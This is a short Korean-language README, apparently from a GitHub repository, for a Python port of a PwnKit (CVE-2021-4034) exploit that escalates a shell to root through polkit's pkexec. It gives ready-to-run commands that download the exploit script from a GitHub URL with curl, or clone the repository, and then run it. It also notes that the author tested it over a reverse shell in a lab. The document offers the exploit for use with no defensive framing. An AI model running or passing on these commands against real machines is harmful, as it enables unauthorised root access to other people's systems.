
PwnKit(CVE-2021-4034) 로컬 권한 상승 취약점을 위한 Python 익스플로잇으로, 취약한 Linux 시스템에서 polkit의 pkexec를 통해 루트 셸 접근을 제공합니다.
이것은 Python으로 작성된 익스플로잇으로, 셸을 확보한 상태에서 x에서 root까지 권한 상승을 수행하기 위한 것입니다. CVE-2021-4034 또는 PwnKit이라고도 불리는 취약점을 통해 작동합니다.
curl -fsSL https://raw.githubusercontent.com/ropydev/CVE-2021-4034-PwnKit/main/main.py -o exploit.py
python3 exploit.py
git clone https://github.com/ropydev/CVE-2021-4034-PwnKit.git
cd CVE-2021-4034-PwnKit
python main.py
이 예시들은 리버스 셸을 이용한 실습 환경에서 수행되었으며, 이를 통해 익스플로잇을 실행하고 쉽게 root로 상승했습니다.
이 프로그램은 원래 C로 작성된 원본 프로그램의 "번역" 또는 Python에 해당하는 버전입니다.